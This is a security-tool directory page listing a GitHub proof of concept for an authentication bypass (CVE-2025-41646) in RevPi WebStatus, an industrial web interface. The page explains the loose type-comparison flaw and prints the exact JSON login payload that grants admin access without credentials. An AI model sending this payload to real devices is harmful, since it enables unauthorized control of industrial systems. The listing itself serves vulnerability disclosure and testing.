Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-41646---Critical-Authentication-Bypass- — CVE-2025-41646 - Critical Authentication bypass | Kitploit
Tools/GitHubGitHub/greenforcenetworks/cve-2025-41646---critical-authentication-bypass-
Authentication & AuthorizationIoT SecurityVulnerability AnalysisExploitationIDS/IPS EvasionSCADA/ICS SecurityWeb Application ExploitationPenetration Testing

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHub
greenforcenetworks/cve-2025-41646---critical-authentication-bypass-

CVE-2025-41646---Critical-Authentication-Bypass-

CVE-2025-41646 - Critical Authentication bypass

View Repository
11 year agoNot yet reviewed

CVE-2025-41646---Critical-Authentication-Bypass-

CVE-2025-41646 - Critical Authentication bypass

🔓 CVE-2025-41646 - RevPi WebStatus Authentication Bypass PoC

A critical authentication bypass vulnerability (CVE-2025-41646) in RevPi WebStatus ≤ v2.4.5 allows an attacker to log in as admin without valid credentials due to weak type comparison logic (== vs ===).


📌 Affected

  • RevPi WebStatus v2.4.5 and below
  • Industrial/OT systems running on Raspbian with Apache

💥 Exploitation

Send a login request with:

root@kitploit:~
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}
Download Tool